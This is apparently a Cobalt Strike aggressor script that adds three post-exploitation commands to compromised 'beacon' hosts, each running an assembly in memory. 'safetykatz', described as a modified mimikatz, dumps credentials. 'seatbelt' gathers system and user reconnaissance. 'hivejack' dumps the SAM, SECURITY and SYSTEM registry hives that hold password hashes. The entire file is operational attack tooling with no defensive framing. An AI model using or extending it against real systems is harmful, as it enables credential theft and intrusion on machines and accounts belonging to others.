alias safetykatz{
    bexecute_assembly($1, script_resource("post/SafetyKatz.exe"), "");
}
beacon_command_register(
	"safetykatz", 
	"it's a modified mimikatz", 
	"");


alias seatbelt{
    if ($2 eq "system"){
        bexecute_assembly($1, script_resource("post/Seatbelt.exe"), "system");
    }
    else if ($2 eq "user"){
        bexecute_assembly($1, script_resource("post/Seatbelt.exe"), "user");
    }
    else if ($2 eq "all"){
        bexecute_assembly($1, script_resource("post/Seatbelt.exe"), "all");
    }
    else{
        local('@args_list $args');
        $args = "";
        @args_list = sublist(@_, 1);
        foreach $arg (@args_list){
            $args .= $arg . " ";
        }
        bexecute_assembly($1, script_resource("post/Seatbelt.exe"), $args);
    }
}
beacon_command_register(
	"seatbelt", 
	"Gather system, user and other informations on the target.", 
	"");


alias hivejack{
    local('@args_list $args');
    $args = "";
    @args_list = sublist(@_, 1);
    foreach $arg (@args_list){
        $args .= $arg . " ";
    }
    bexecute_assembly($1, script_resource("post/HiveJack-Console.exe"), $args);
}

beacon_command_register(
    "hivejack",
    "dump SYSTEM, SECURITY and SAM registry hives",
    "");